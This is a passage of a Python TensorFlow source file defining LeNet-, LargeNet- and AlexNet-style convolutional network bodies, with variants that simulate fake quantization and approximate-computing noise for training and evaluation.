# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=256, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
return net, layers
def LeNetBody_Eval(network, images, preWeights, preBias, preMin, preMax):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
# output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=16, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1', dtype=tf.float32)
net.setMinMax(preMin['Conv1'], preMax['Conv1'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2', dtype=tf.float32)
net.setMinMax(preMin['Conv2'], preMax['Conv2'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3', dtype=tf.float32)
net.setMinMax(preMin['Conv3'], preMax['Conv3'])
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=256, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
net.setMinMax(preMin['FC1'], preMax['FC1'])
layers.append(net)
return net, layers
def LeNetBigBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
return net.output, layers
def LeNetBigBNBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
return net.output, layers
def LeNetBigBody_Quant(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
return net, layers
def LeNetBigBody_Approx(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output += PORTION * (output - tf.reduce_min(output)) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
output += PORTION * tf.abs(output) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
return net, layers
def LeNetBigBody_Eval(network, images, preWeights, preBias, preMin, preMax):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
# output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1', dtype=tf.float32)
net.setMinMax(preMin['Conv1'], preMax['Conv1'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2', dtype=tf.float32)
net.setMinMax(preMin['Conv2'], preMax['Conv2'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3', dtype=tf.float32)
net.setMinMax(preMin['Conv3'], preMax['Conv3'])
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
net.setMinMax(preMin['FC1'], preMax['FC1'])
layers.append(net)
return net, layers
def LargeNetBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
return net.output, layers
def LargeNetBody_Quant(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3b', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
return net, layers
def LargeNetBody_Eval(network, images, preWeights, preBias, preMin, preMax):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
# output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
net.setMinMax(preMin['Conv1a'], preMax['Conv1a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
net.setMinMax(preMin['Conv1b'], preMax['Conv1b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
net.setMinMax(preMin['Conv2a'], preMax['Conv2a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
net.setMinMax(preMin['Conv2b'], preMax['Conv2b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
net.setMinMax(preMin['Conv3a'], preMax['Conv3a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
net.setMinMax(preMin['Conv3b'], preMax['Conv3b'])
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=512, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
net.setMinMax(preMin['FC1'], preMax['FC1'])
layers.append(net)
return net, layers
def AlexNetBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
